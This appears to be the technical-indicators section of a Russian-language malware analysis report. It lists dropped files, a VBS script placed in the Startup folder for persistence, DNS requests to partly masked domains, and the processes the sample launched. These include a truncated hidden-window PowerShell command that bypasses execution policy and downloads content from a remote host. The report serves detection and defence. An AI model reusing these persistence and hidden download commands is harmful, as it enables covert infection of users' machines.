Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows.vbs (каталог автозагрузки пользователя: файлы из него запускаются при входе в систему)
- %TEMP%\install.exe
- <Полный путь к файлу>windows.vbs
- %TEMP%\is-28n87.tmp\install.tmp
- %TEMP%\is-emedb.tmp\_isetup\_setup64.tmp
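- DNS ASK go#####analytics.com (DNS-запрос; символы «#» в отчёте, по-видимому, скрывают часть имени домена)
- DNS ASK 5.###4top.net (DNS-запрос; часть имени домена также скрыта)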
- '%TEMP%\install.exe'
- '<SYSTEM32>\wscript.exe' "<Полный путь к файлу>windows.vbs"
- '%TEMP%\is-28n87.tmp\install.tmp' /SL5="$70248,30886599,121344,%TEMP%\install.exe"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://5.top4to...